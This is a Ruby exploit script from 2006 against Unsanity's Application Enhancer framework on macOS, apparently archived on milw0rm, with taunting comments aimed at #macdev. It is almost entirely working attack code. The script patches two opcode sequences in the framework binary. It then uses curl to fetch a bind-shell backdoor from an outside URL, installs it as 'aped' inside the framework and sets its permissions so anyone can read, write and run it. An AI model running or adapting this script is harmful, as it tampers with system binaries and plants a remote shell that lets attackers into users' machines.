# !/usr/bin/ruby # Exploit Of The Apes: A practical pwnage for Application (UN)Enhancer aka APU # (c) 2006 LMH and Johnny Pwnerseed. # # This goes dedicated to #macdev. For the childish flaming and great brain lag. # # Lesson: Don't talk about stuff you have NFC about. And don't insult # people. Once you do it, and get pwned, total lulz ensues ;o( # # MD5 (ApplicationEnhancer) = cf9bf1fa74f8298f09aedce38c72a7da # at offset 27512 0x807d0014 -> 0x38600000 # at offset 115586 0x8b4614890424 -> 0x31c090890424 # require 'fileutils' # Define offsets to opcodes to be patched PATCH_INSTRUCTIONS = [ [ 27512, "\x38\x60\x00\x00" ], [ 115586, "\x31\xc0\x90\x89\x04\x24" ] ] BACKDOO_URL = "http://projects.info-pull.com/moab/bug-files/sample-back" # must be fat binary, sample bind shell PATH_TO_APE = "/Library/Frameworks/ApplicationEnhancer.framework" PATH_TO_APU = "/Library/Frameworks/ApplicationUnenhancer.framework" path_to_bozo = (ARGV[0] || File.join(PATH_TO_APE,"Versions/Current/ApplicationEnhancer")) puts "++ Starting: #{PATH_TO_APE}" puts "++ Back-up: #{PATH_TO_APU}" # Move the original framework to back-up, copy contents back, set permissions. # To repair: # rm -rf /Library/Frameworks/ApplicationEnhancer.framework # mv /Library/Frameworks/ApplicationUnenhancer.framework \ # /Library/Frameworks/ApplicationEnhancer.framework if File.exists?(PATH_TO_APE) unless File.exists?(PATH_TO_APU) FileUtils.mv(PATH_TO_APE, PATH_TO_APU) FileUtils.cp_r(PATH_TO_APU, PATH_TO_APE) system "chmod u+w #{File.join(PATH_TO_APE, "Versions/A/ApplicationEnhancer")}" end end # Patching poor Apu (we could just replace the binary, but this is cooler as the # guys at Unsanity, LLC think they can dropriv and forget all about flawed code...). bozo = File.read(path_to_bozo) puts "++ Patch: #{path_to_bozo}" PATCH_INSTRUCTIONS.each do |patch| offset = patch[0] # start offset bindata = patch[1] # patch bytes bcount = 0 puts "++ Patching stage: offset=#{offset} patch size=#{bindata.size}" bindata.split(//).each do |patch_byte| target_offset = offset + bcount printf "++ Patching byte at %x\n", target_offset bozo[target_offset] = patch_byte bcount += 1 end end puts "++ Binary pwnage done. Writing patched data..." u_bozo = File.new(File.join(PATH_TO_APE, "/Versions/A/ApplicationEnhancer"), "w") u_bozo.write(bozo) u_bozo.close puts "++ Done (#{bozo.size} bytes). Planting backdoor aped binary..." aped_path = File.join(PATH_TO_APE, "Resources/aped") system "chmod a+rxw #{aped_path}" # let everyone backdoor it afterwards, be social and share! system "curl #{BACKDOO_URL} -o #{aped_path}" system "chmod a+x #{aped_path}" puts "++ Finished." # milw0rm.com [2007-01-08]